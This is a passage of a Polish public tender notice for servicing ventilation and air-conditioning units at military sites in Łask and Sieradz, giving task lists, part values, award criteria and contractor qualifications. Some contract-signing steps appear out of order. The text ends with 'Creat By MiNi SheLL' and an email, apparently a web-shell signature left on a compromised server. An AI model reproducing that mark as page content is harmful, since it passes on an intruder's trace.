sterujące);<br/>3.9.	Oczyszczenie agregatów z zanieczyszczeń mechanicznych – mycie skraplaczy myjką ciśnieniową należy do Wykonawcy;<br/>3.10.	Zakup i wymiana elementów – zainstalowanych w urządzeniu (paski klinowe, uszczelki, żarówki, bezpieczniki, itp w ramach zawartej umowy leży po stronie Wykonawcy). <br/>3.11.	Sprawdzenia szczelności urządzeń klimatyzacyjnych zawierających co najmniej 3 kg fluorowanych gazów cieplarnianych, lub co najmniej 5 ton ekwiwalentu CO2 fluorowanych gazów cieplarnianych.<br/>3.12.	Zakup i 2 krotna wymiana filtrów w centralach wentylacyjnych wraz z odkurzaniem należy do Wykonawcy (obiekt nr 37). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 95657,76 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W częściach 1- 4 za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryterium, wg wzoru przedstawionego w tabeli:<br/>LP = A + B gdzie<br/>KRYTERIUM	WAGA (%)<br/>A	Liczba punktów uzyskanych w kryterium „cena oferty”	60<br/>B	Liczba punktów uzyskanych w kryterium <br/>„czas reakcji w sytuacjach awaryjnych”	40<br/>LP	Suma punktów uzyskanych przez badaną ofertę 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji w sytacjach awaryjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Centrale wentylacyjne VTS Clima- Ventus , Inwent (JW 1551 Sieradz).<br/>1.1. Zakup i 6 krotna wymiana filtrów w centralach wentylacyjnych wraz z odkurzaniem należy do Wykonawcy (obiekt nr 32). <br/>1.2. Zakup i 3 krotna wymiana filtrów w centralach wentylacyjnych wraz z odkurzaniem należy do Wykonawcy (obiekt nr 28, 29, 30).<br/>1.3. Dla obiektu nr 29 wymiana wkładów filtracyjnych z włókniny gr.2 cm o wymiarach 500x1000mm szt.4 + 800x2000mm szt.4 wymiana 3 razy w roku.<br/>1.4. Sprawdzenie prawidłowości działania nagrzewnic;<br/>1.5. Sprawdzenie prawidłowości działania chłodnicy wraz z ewentualnym udrożnieniem odpływu skroplin;<br/>1.6. Sprawdzenie stanu technicznego i prawidłowości działania presostatów;<br/>1.7. Sprawdzenie prawidłowości działania silnika i wirnika wentylator wraz z wyczyszczeniem wnętrza sekcji przynajmniej jeden raz w okresie obowiązującej umowy;<br/>1.8. Sprawdzenie stanu technicznego działania przepustnicy wraz z jej wyczyszczeniem przynajmniej jeden raz w trakcie obowiązującej umowy;<br/>1.9. Kontrola stanu/wymiana filtrów;<br/>1.10. Nastawa termostatu p – zamarzeniowego;<br/>1.11. Kontrola stanu zużycia łożysk, sprawdzenie naciągów pasków klinowych, regulacja i ewentualna wymiana pasków;<br/>1.12. Czyszczenie wymienników ciepła, wymienników krzyżowych, kratek wentylacyjnych połączonych kanałami z centralami wentylacyjnymi, anemostatów.<br/>1.13. Nastawa zabezpieczeń/sprawdzenie i regulacja;<br/>1.14. Sprawdzenie prawidłowości działania urządzeń wraz z automatyką sterującą<br/>1.15. Zakup i wymiana elementów – zainstalowanych w urządzeniu (paski klinowe, uszczelki, żarówki, bezpieczniki, itp w ramach zawartej umowy leży po stronie Wykonawcy);<br/>1.16. Dla obiektu nr 29 (pomieszczenie lakierni) wymagana jest wymiana 3 razy w roku wkładów filtracyjnych w włókniny gr.2 cm o wymiarach 500 x 1000 mm szt. 4 oraz 800 x 2000 szt. 4;<br/>1.17. Dla obiektu nr 32 zakup i wymiana filtrów (co 2 m-ce) należy do Wykonawcy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 33000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W częściach 1- 4 za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryterium, wg wzoru przedstawionego w tabeli:<br/>LP = A + B gdzie<br/>KRYTERIUM	WAGA (%)<br/>A	Liczba punktów uzyskanych w kryterium „cena oferty”	60<br/>B	Liczba punktów uzyskanych w kryterium <br/>„czas reakcji w sytuacjach awaryjnych”	40<br/>LP	Suma punktów uzyskanych przez badaną ofertę 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji w sytuacjach awaryjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4.1.	W części 1: Instalacje Wentylacji – VTS Clima, VBW, Clima Produkt, pompy ciepła Clint (32 BLT Łask):<br/>- minimum 2 osobami posiadającymi ważne świadectwa kwalifikacyjne - kat. E uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji do obsługi instalacji elektroenergetycznych o napięciu nie wyższym niż 1 kV) - wydane zgodnie z Rozporządzeniem Ministra Gospodarki Pracy i Polityki Społecznej z dnia 20.07.2005 r. (Dz.U.2005.141.1189), w sprawie szczegółowych zasad stwierdzenia posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci,<br/>- minimum 2 osobami z uprawnieniami do pracy na wysokości powyżej 3 m,<br/>- odkurzaczem przemysłowym,<br/>- drabiną na min. wysokość 6 m,<br/>- rusztowaniem na kółkach o wysokości min. 10 m dla obiektu nr 33,<br/>- certyfikat FGAZ dla przedsiębiorców wydany przez Urząd Dozoru Technicznego,<br/>4.1.1.	O udzielenie zamówienia w części 1 może ubiegać się Wykonawca, który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres jest krótszy – w tym okresie, wykonał lub wykonuje co najmniej 1 usługę w zakresie konserwacji przedmiotowych systemów na kwotę powyżej 40 000, 00 zł brutto.<br/><br/>4.2.	W części 2: Instalacje Wentylacji i Nawilżania – Swegon, Walter Mayer <br/>(32 BLT Łask):<br/>- minimum 2 osobami posiadającymi aktualne szkolenie dla pracowników wykonujących przeglądy i konserwacje dla instalacji wentylacji firmy SWEGON, <br/>- minimum 2 osobami posiadającymi ważne świadectwa kwalifikacyjne - kat. E uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji do obsługi instalacji elektroenergetycznych o napięciu nie wyższym niż 1 kV) - wydane zgodnie z Rozporządzeniem Ministra Gospodarki Pracy i Polityki Społecznej z dnia 20.07.2005 r. (Dz.U.2005.141.1189), w sprawie szczegółowych zasad stwierdzenia posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci,<br/>- minimum 2 osobami z uprawnieniami do pracy na wysokości powyżej 3 m,<br/>- odkurzaczem przemysłowym,<br/>- drabiną na min. wysokość 6 m,<br/>4.2.1.	O udzielenie zamówienia w części 2 może ubiegać się Wykonawca, który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres jest krótszy – w tym okresie, wykonał lub wykonuje co najmniej 1 usługę w zakresie konserwacji przedmiotowych systemów na kwotę powyżej 10 000, 00 zł brutto.<br/><br/>4.3.	W części 3: Instalacje Klimatyzacji i agregaty wody lodowej - Kaisai, GEA, Aermec, McQuay, LG VRF, Windex, Excel, Fujitsu, Daikin, Hitachi, Zibro, Gree, Mitsubishi, Klimor, Dan Poltherm, VBW, Sinclair, Bard, Maxa, Hidros, MDV, Chigo, Split (32 BLT Łask):<br/>- minimum 2 osobami posiadającymi aktualne szkolenie firmy LG systemu<br/> typu Multi V/RAC/CAC,<br/>- oprogramowaniem LG do diagnozowania usterek występujących na obiekcie <br/>nr 36,<br/>- minimum 2 osobami posiadającymi ważne świadectwa kwalifikacyjne - kat. E uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji do obsługi instalacji elektroenergetycznych o napięciu nie wyższym niż 1 kV) - wydane zgodnie z Rozporządzeniem Ministra Gospodarki Pracy i Polityki Społecznej z dnia 20.07.2005 r. (Dz.U.2005.141.1189), w sprawie szczegółowych zasad stwierdzenia posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci,<br/>- minimum 2 osobami z uprawnieniami do pracy na wysokości powyżej 3 m,<br/>- odkurzaczem przemysłowym,<br/>- drabiną na min. wysokość 6 m,<br/>- do przeprowadzenia przeglądu 2 klimatyzatorów na obiekcie nr 9 oraz nr 37 Wykonawca zabezpieczy zwyżkę min. 10 m w ramach przetargu bez ponoszenia dodatkowych kosztów przez Zamawiającego,<br/>- certyfikat FGAZ dla przedsiębiorców wydany przez Urząd Dozoru Technicznego,<br/>4.3.1.	O udzielenie zamówienia w części 3 może ubiegać się Wykonawca, który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres jest krótszy – w tym okresie, wykonał lub wykonuje co najmniej 1 usługę w zakresie konserwacji przedmiotowych systemów na kwotę powyżej 40 000, 00 zł brutto.<br/><br/>W części 4: Instalacje Wentylacji – VTS Clima, Ventus, Inwent (JW. 1551 Sieradz):<br/>- minimum 2 osobami posiadającymi ważne świadectwa kwalifikacyjne - kat. E uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji do obsługi instalacji elektroenergetycznych o napięciu nie wyższym niż 1 kV) - wydane zgodnie z Rozporządzeniem Ministra Gospodarki Pracy i Polityki Społecznej z dnia 20.07.2005 r. (Dz.U.2005.141.1189), w sprawie szczegółowych zasad stwierdzenia posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci,<br/>- minimum 2 osobami z uprawnieniami do pracy na wysokości powyżej 3 m,<br/>- odkurzaczem przemysłowym,<br/>- drabiną na min. wysokość 6 m,<br/>O udzielenie zamówienia w części 4 może ubiegać się Wykonawca, który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres jest krótszy – w tym okresie, wykonał lub wykonuje co najmniej 1 usługę w zakresie konserwacji przedmiotowych systemów na kwotę powyżej 10 000, 00 zł brutto.<br/><br/>Zamawiający dopuszcza posiadanie szkoleń wymaganych w zakresie różnych części przez 1 osobę, tzn. jedna osoba może posiadać więcej niż jedno wymagane uprawnienie, o których mowa wyżej.<br/>W przypadku ubiegania się o udzielenie zamówienia na większą ilość części postępowania Wykonawca wykaże, iż posiada doświadczenie w realizacji usług na wymaganą kwotę do każdej części po jednej referencji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia, potwierdzające brak podstaw wykluczenia i spełnienie warunków udziału w postępowaniu. Dokument sporządza się według wzoru stanowiącego - załącznik nr 2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego - załącznik nr 7 SWZ wraz z informacją na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami, oraz dowodami poświadczającymi odbycie wymaganego szkolenia:<br/><br/><br/>wykaz usług - wg wzoru stanowiącego załącznik nr 8 SWZ zawierający informacje dotyczące rodzaju i wartości wykonanych lub wykonywanych usług, o których mowa w ROZDZIALE 6 SWZ ze wskazaniem daty wraz z załączeniem dokumentów potwierdzających, że usługi zostały wykonane należycie (np. referencje potwierdzające ich prawidłowe i terminowe wykonanie, protokoły odbioru, itp.); <br/><br/>Dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br/><br/>wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami, o których mowa w ROZDZIALE 6 ust. 4 SWZ - wg załącznika nr 9 do SWZ;<br/><br/>Według załączników, zgodnie z warunkami udziału w postępowaniu odpowiednio dla każdej części postępowania,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych, tj. dokumentów dotyczących przedmiotu zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykonawca składa wraz z ofertą następujące dokumenty i załączniki:<br/>1.1.	formularz ofertowy wypełniony i podpisany przez Wykonawcę zgodnie ze wzorem – załącznik nr 1 do SWZ;<br/>1.2.	oświadczenie stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu przygotowany zgodnie ze wzorem – załącznik nr 2 do SWZ; <br/>1.4.	oświadczenie, stanowiące załącznik nr 2 do SWZ (jeśli dotyczy) składają wraz z ofertą także odrębnie:<br/>1.4.1.każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia; w takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>1.4.2.podmiot udostępniający, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu, w takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy;<br/><br/>1.3.	formularz cenowy sporządzony z wykorzystaniem wzoru – załącznik nr 3 do SWZ,<br/>1.4.	pełnomocnictwo osób podpisujących ofertę, o ile nie wynika z przepisów prawa lub innych dokumentów, złożone w oryginale albo w formie kopii poświadczonej notarialnie – treść pełnomocnictwa powinna dokładnie określić zakres umocowania - jeśli dotyczy.<br/>1.5.	pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - jeśli dotyczy.<br/>1.6.	oświadczenia Wykonawców wspólnie ubiegających się o udzielenie zamówienia – załącznik nr 5 do SWZ- jeśli dotyczy <br/>1.7.	zobowiązanie podmiotu udostępniającego zasoby – załącznik nr 6 do SWZ - jeśli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Sposób weryfikacji braku podstaw wykluczenia i spełnienia warunków udziału w postępowaniu przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1.1.	Oświadczenia potwierdzające warunki udziału w postępowaniu oraz brak podstaw wykluczenia– załącznik nr 2 do SWZ każdy z Wykonawców składa osobno. <br/>2.	W przypadku wspólnego ubiegania się o udzielenie zamówienia, Wykonawcy zobowiązani są ustanowić lidera/pełnomocnika do reprezentowania ich w postępowaniu przetargowym oraz zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Powyższe nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3.	W powyższym przypadku oświadczenie według wzoru - załącznik nr 5 do SWZ składają wraz z ofertą Wykonawcy wspólnie ubiegający się o zamówienie.<br/>4.	Jeżeli oferta Wykonawców, o których mowa w RODZIALE 7. zostanie wybrana, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, kopię umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy Zakupowej dostępnej na stronie internetowej: https://platformazakupowa.pl/pn/32_blot w zakładce przedmiotowego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-18 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu osobistego<br/>(certyfikat zainstalowany w e-dowodzie) lub podpisu zaufanego.<br/><br/><br/>1.2	Kryterium „czas reakcji w sytuacjach awaryjnych”<br/><br/>Zamawiający stawia warunek, iż Wykonawca przystąpi do realizacji przedmiotu zamówienia po otrzymaniu zgłoszenia o awarii technicznej w czasie min. 1 godz. i maksymalnie 10 godz. od powiadomienia o zdarzeniu, przez 7 dni w tygodniu.<br/><br/>Zamawiający zawrze umowę z wybranym Wykonawcą na piśmie w terminie nie krótszym niż 5 dni od dnia przekazania zawiadomienia o wyborze oferty drogą elektroniczną, nie później jednak<br/>niż przed upływem terminu związania ofertą. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w pkt 1, jeżeli w postępowaniu<br/>o udzielenie zamówienia złożono tylko jedną ofertę.[3] Jeżeli Wykonawca, którego oferta zostanie wybrana, będzie się uchylał od zawarcia umowy, zamawiający wybierze ofertę najkorzystniejszą spośród pozostałych ofert. Przez uchylenia się od zawarcia umowy<br/>zamawiający rozumie „dwukrotne nieusprawiedliwione przez Wykonawcę niestawienie się w wyznaczonym terminie do podpisania umowy”.[4] Zamawiający zawiadomi wybranego<br/>Wykonawcę o miejscu i terminie podpisania umowy. Osoby reprezentujące wykonawcę przy podpisywaniu umowy powinny posiadać ze sobą dokumenty potwierdzające ich umocowanie do<br/>podpisania umowy, o ile umocowanie to nie będzie wynikać z dokumentów załączonych do oferty. <br/>[5] Zamawiający preferuje zawarcie umowy na odległość. Umowa zostanie zawarta w[5.2] Wykonawca sprawdza poprawność zawartych w umowie danych, parafuje każdą stronę,<br/>składa odręczny podpis, pieczęć i wysyła do zamawiającego;<br/>[5.3] umowa zostaje podpisana i zarejestrowana przez Zamawiającego – wówczas umowa nabiera mocy prawnej;<br/>[5.4]Zamawiający informuje o powyższym fakcie wykonawcę drogą elektroniczną i odsyła trzeci egzemplarz umowy pocztą.<br/>Postanowienia w sprawie dokumentów zastrzeżonych.<br/>1. Wszystkie dokumenty złożone w prowadzonym postępowaniu są jawne, za wyjątkiem informacji zastrzeżonych na podstawie art. 18 ust. 3 ustawy Pzp przez składającego ofertę.<br/>2. Dokumenty zastrzeżone Wykonawca wydziela (umieszczając je w osobnym pliku) i oznacza jako „TAJEMNICA PRZEDSIĘBIORSTWA”.<br/>3. Wykonawca zastrzegający informacje zawarte w swojej ofercie musi załączyć uzasadnienie, dlaczego nie mogą być one udostępnione innym podmiotom. Zastrzeżenie dokumentów dokonane bez uzasadnienia, będzie traktowane jako bezskuteczne.<br/>następujący sposób: [5.1] Zamawiający przesyła do wykonawcy umowę w formie elektronicznej;

Creat By MiNi SheLL
Email: jattceo@gmail.com